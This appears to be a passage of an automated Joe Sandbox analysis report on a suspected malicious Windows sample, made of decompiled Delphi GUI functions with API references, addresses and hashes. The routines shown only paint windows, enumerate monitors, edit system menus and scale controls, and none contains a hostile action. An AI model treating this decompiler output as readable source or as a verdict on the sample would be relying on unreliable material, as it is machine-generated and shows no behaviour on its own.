                                  0x00425ef4
                                  0x00425eff
                                  0x00425f08
                                  0x00425f17
                                  0x00425f31
                                  0x00425f3d
                                  0x00425f3e
                                  0x00425f3f
                                  0x00425f40
                                  0x00425f41
                                  0x00425f52
                                  0x00425f52
                                  0x00425ef4
                                  0x00425f77
                                  0x00425f83
                                  0x00425f96
                                  0x00425f9d
                                  0x00425fa0
                                  0x00425fa3
                                  0x00425fab
                                  0x00425faf
                                  0x00425fb4
                                  0x00425fb5
                                  0x00425fba
                                  0x00425fba

                                  APIs
                                  • GetWindowLongA.USER32 ref: 00425E7B
                                  • GetWindowRect.USER32 ref: 00425E96
                                  • OffsetRect.USER32(?,?,?), ref: 00425EAB
                                  • 72E7B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00425EB9
                                  • GetWindowLongA.USER32 ref: 00425EEA
                                  • GetSystemMetrics.USER32 ref: 00425EFF
                                  • GetSystemMetrics.USER32 ref: 00425F08
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00425F17
                                  • GetSysColorBrush.USER32(0000000F), ref: 00425F44
                                  • FillRect.USER32 ref: 00425F52
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00425FBB,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00425F77
                                  • 72E7B380.USER32(00000000,?,00425FC2,?,?,00000000,00425FBB,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00425FB5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                  • String ID:
                                  • API String ID: 3936689491-0
                                  • Opcode ID: 9324ecb7928763b8aa494e38613d7ce824e082933cf04a826453b82e8629d0d3
                                  • Instruction ID: de85d42abca62c709ce2260da3e2f52b379b9394287fd5632d29bbfe05bb0d53
                                  • Opcode Fuzzy Hash: 9324ecb7928763b8aa494e38613d7ce824e082933cf04a826453b82e8629d0d3
                                  • Instruction Fuzzy Hash: 22414071A00518AFCB01EAE9CD42EDFB7BDEF49324F510126F905F7281C678AE0587A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004220E4, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E004220E4(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x44f927 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x44f914 = E00421B38(7, _t60,  *0x44f914, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                  0x004220ed
                                  0x004220f0
                                  0x004220fa
                                  0x0042212a
                                  0x00422130
                                  0x004221ec
                                  0x004221f4
                                  0x004221f4
                                  0x00422138
                                  0x0042213d
                                  0x00422148
                                  0x00422153
                                  0x00422158
                                  0x004221c1
                                  0x004221d9
                                  0x004221ea
                                  0x004221d5
                                  0x004221d5
                                  0x004221d5
                                  0x00000000
                                  0x004221c1
                                  0x00422164
                                  0x00422173
                                  0x00000000
                                  0x00000000
                                  0x00422185
                                  0x0042219d
                                  0x004221b3
                                  0x00000000
                                  0x00000000
                                  0x004221b9
                                  0x004221bb
                                  0x004221bb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042219d
                                  0x0042210e
                                  0x00422123
                                  0x00000000

                                  APIs
                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042211D
                                  • GetSystemMetrics.USER32 ref: 00422142
                                  • GetSystemMetrics.USER32 ref: 0042214D
                                  • GetClipBox.GDI32(?,?), ref: 0042215F
                                  • GetDCOrgEx.GDI32(?,?), ref: 0042216C
                                  • OffsetRect.USER32(?,?,?), ref: 00422185
                                  • IntersectRect.USER32 ref: 00422196
                                  • IntersectRect.USER32 ref: 004221AC
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                  • String ID: EnumDisplayMonitors
                                  • API String ID: 362875416-2491903729
                                  • Opcode ID: c447c8a639b653406857bb11d3e501cf41a9d1f553696839e4d44940276954b9
                                  • Instruction ID: dd36abe407eb744ef8976a326b6c88aae4d1b7ace6775b9ec6243657e7a966d0
                                  • Opcode Fuzzy Hash: c447c8a639b653406857bb11d3e501cf41a9d1f553696839e4d44940276954b9
                                  • Instruction Fuzzy Hash: A5311E75A00219BEDB11DFA5DD44EFF77BCAB09310F404137EA11E2241EB789A15CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430734, Relevance: 16.6, APIs: 11, Instructions: 133COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00430734(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0042F340(_t83) != 0) {
						_t38 = E00430258(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L004062C0();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L00405FC0();
					_v12 = _t47;
					L004064F8();
					L00405FC8();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E004325A4(_t83),  &_v80);
					E0042D05C(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E00430734(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x430886, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L00405FA8();
					EndPaint(E004325A4(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x43088d);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                  0x00430735
                                  0x00430737
                                  0x0043073c
                                  0x0043073d
                                  0x0043073f
                                  0x00430748
                                  0x00430754
                                  0x00430773
                                  0x00430761
                                  0x00430767
                                  0x00430767
                                  0x00430893
                                  0x0043077d
                                  0x0043077f
                                  0x0043078d
                                  0x0043079b
                                  0x0043079e
                                  0x004307a3
                                  0x004307a8
                                  0x004307ae
                                  0x004307b5
                                  0x004307ba
                                  0x004307ca
                                  0x004307d8
                                  0x004307e7
                                  0x004307fc
                                  0x00430804
                                  0x0043080b
                                  0x00430812
                                  0x00430829
                                  0x00430837
                                  0x0043083d
                                  0x0043083e
                                  0x00430840
                                  0x00430843
                                  0x00430854
                                  0x0043085b
                                  0x0043085e
                                  0x00430861
                                  0x0043086e
                                  0x00430877
                                  0x00430885
                                  0x00430885

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0043077F
                                  • 72E7A520.GDI32(00000000,?), ref: 004307A3
                                  • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 004307AE
                                  • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 004307B5
                                  • SelectObject.GDI32(00000000,?), ref: 004307C5
                                  • BeginPaint.USER32(00000000,?,00000000,00430886,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004307E7
                                  • 72E897E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00430843
                                  • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00430854
                                  • SelectObject.GDI32(00000000,?), ref: 0043086E
                                  • DeleteDC.GDI32(00000000), ref: 00430877
                                  • DeleteObject.GDI32(?), ref: 00430880
                                    • Part of subcall function 00430258: BeginPaint.USER32(00000000,?), ref: 0043027E
                                    • Part of subcall function 00430258: EndPaint.USER32(00000000,?,0043037F), ref: 00430372
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                  • String ID:
                                  • API String ID: 3782911080-0
                                  • Opcode ID: 56195f3e972268beac2185bc498dc5b09f12682e3a3bb39b51d8af3145d6b67f
                                  • Instruction ID: 4b093a1ebe963f4d8922688ddba499105a4c7b73df9a186bd078be7a66176fe1
                                  • Opcode Fuzzy Hash: 56195f3e972268beac2185bc498dc5b09f12682e3a3bb39b51d8af3145d6b67f
                                  • Instruction Fuzzy Hash: 56415E71B00204AFD710EFA9CD85F9EB7F8AF48704F10457AB505EB281DA78ED058B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004303B0, Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004303B0(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E00413524( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041BA40(0xff000010));
							E004120F0( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041BA40(0xff000014));
							E004120F0( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00413580(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E00413524( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E004120F0( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E0042A82C(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E0042D05C(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                  0x004303b4
                                  0x004303b7
                                  0x004303b9
                                  0x004303bb
                                  0x004303c4
                                  0x004303e2
                                  0x004303e2
                                  0x004303e5
                                  0x004303ed
                                  0x004304d2
                                  0x004304d2
                                  0x004304da
                                  0x004305df
                                  0x004305df
                                  0x004305df
                                  0x004304e3
                                  0x004304e6
                                  0x00000000
                                  0x00000000
                                  0x004304ed
                                  0x004304f1
                                  0x004304f3
                                  0x004304fb
                                  0x00430500
                                  0x00430509
                                  0x00430543
                                  0x00430566
                                  0x00430571
                                  0x0043057b
                                  0x00430590
                                  0x004305b3
                                  0x004305be
                                  0x004305c8
                                  0x004305c8
                                  0x004305cd
                                  0x004305ce
                                  0x004305ce
                                  0x004305ce
                                  0x00000000
                                  0x004304f3
                                  0x004303f3
                                  0x004303f7
                                  0x00430400
                                  0x00430404
                                  0x00430406
                                  0x00430406
                                  0x00430404
                                  0x00430411
                                  0x00430417
                                  0x0043041d
                                  0x0043042a
                                  0x00430430
                                  0x0043045e
                                  0x00430470
                                  0x00430476
                                  0x00430478
                                  0x00430478
                                  0x00430484
                                  0x00430490
                                  0x004304a2
                                  0x004304b2
                                  0x004304bd
                                  0x004304c2
                                  0x004304c2
                                  0x00430470
                                  0x004304c8
                                  0x004304c9
                                  0x0043041d

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                  • String ID:
                                  • API String ID: 375863564-0
                                  • Opcode ID: 8af92932acbbcdba17adce9903c0bc9abc033bb1f1062aa68734c457e1fd9d91
                                  • Instruction ID: 948155c53ead4b37ac5969980ba2b58b60aa4b19ead75233f634ce589e2b2144
                                  • Opcode Fuzzy Hash: 8af92932acbbcdba17adce9903c0bc9abc033bb1f1062aa68734c457e1fd9d91
                                  • Instruction Fuzzy Hash: 26516171204244AFDB54DF29C8D4B5B7BD8AF48308F04455EFE89CB286D739E845CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00446A84, Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00446A84(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E004325A4( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





                                  0x00446a8b
                                  0x00446a95
                                  0x00446a9e
                                  0x00446aa8
                                  0x00446ab1
                                  0x00446abb
                                  0x00446ad4
                                  0x00446ae3
                                  0x00446aed
                                  0x00446afa
                                  0x00446b07
                                  0x00446b14
                                  0x00446b21
                                  0x00446b2e
                                  0x00000000
                                  0x00446b3b
                                  0x00446b4f
                                  0x00446b59
                                  0x00446b59
                                  0x00446b61
                                  0x00446b6b
                                  0x00000000
                                  0x00446b75
                                  0x00446b6b
                                  0x00446abb
                                  0x00446aa8
                                  0x00446b7c

                                  APIs
                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00446ACF
                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00446AED
                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446AFA
                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446B07
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00446B14
                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00446B21
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00446B2E
                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00446B3B
                                  • EnableMenuItem.USER32 ref: 00446B59
                                  • EnableMenuItem.USER32 ref: 00446B75
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$EnableItem$System
                                  • String ID:
                                  • API String ID: 3985193851-0
                                  • Opcode ID: 2f0899564c40516607fb71efaa627f955455b637499460648eac4926440eb682
                                  • Instruction ID: 78e64faa74cf5f53c189cd593ce406538b814d4a05768ccefab374ea047b60d7
                                  • Opcode Fuzzy Hash: 2f0899564c40516607fb71efaa627f955455b637499460648eac4926440eb682
                                  • Instruction Fuzzy Hash: 85219F703803507AE760AB64CC8EF597BD89B05B19F0240A5BA05BF2D3C6BCF990871C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042BAFC, Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042BAFC(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x42bca8; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x42bca0; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x42bca8; // 0x0
				if(_t113 != (_t107 &  *0x42bca4)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x42bca8; // 0x0
				if(_t114 != (_t107 &  *0x42bcac)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041C1A0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041C184( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                  0x0042bb03
                                  0x0042bb06
                                  0x0042bb08
                                  0x0042bb0d
                                  0x0042bc8a
                                  0x0042bc8a
                                  0x0042bc8f
                                  0x0042bc9c
                                  0x0042bc9c
                                  0x0042bb17
                                  0x0042bb21
                                  0x0042bb19
                                  0x0042bb19
                                  0x0042bb19
                                  0x0042bb2a
                                  0x0042bb3e
                                  0x0042bb2c
                                  0x0042bb3a
                                  0x0042bb3a
                                  0x0042bb44
                                  0x0042bb5d
                                  0x0042bb46
                                  0x0042bb54
                                  0x0042bb54
                                  0x0042bb64
                                  0x0042bb9e
                                  0x0042bba1
                                  0x0042bb6c
                                  0x0042bb6f
                                  0x0042bb93
                                  0x0042bb98
                                  0x0042bb71
                                  0x0042bb82
                                  0x0042bb84
                                  0x0042bb84
                                  0x0042bb6f
                                  0x0042bba8
                                  0x0042bbad
                                  0x0042bbf1
                                  0x0042bbb5
                                  0x0042bbbd
                                  0x0042bbe8
                                  0x0042bbbf
                                  0x0042bbd4
                                  0x0042bbd4
                                  0x0042bbbd
                                  0x0042bc09
                                  0x0042bc17
                                  0x0042bc1f
                                  0x0042bc32
                                  0x0042bc32
                                  0x0042bc40
                                  0x0042bc48
                                  0x0042bc5b
                                  0x0042bc5b
                                  0x0042bc65
                                  0x0042bc85
                                  0x0042bc85
                                  0x00000000

                                  APIs
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BB35
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BB4F
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BB7D
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BB93
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BBCB
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042BBE3
                                  • MulDiv.KERNEL32(?,?,0000001F), ref: 0042BC2D
                                  • MulDiv.KERNEL32(?,?,0000001F), ref: 0042BC56
                                  • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0042BC7C
                                    • Part of subcall function 0041C1A0: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041C1AD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f7a259c81de0681f34d6b9b5f73fdfca877d5785c7660d599a12c87edb8c46d
                                  • Instruction ID: 159c87e6bfc539613c9d6119799157cc65323f6dcd2cda502b56c717b853f75a
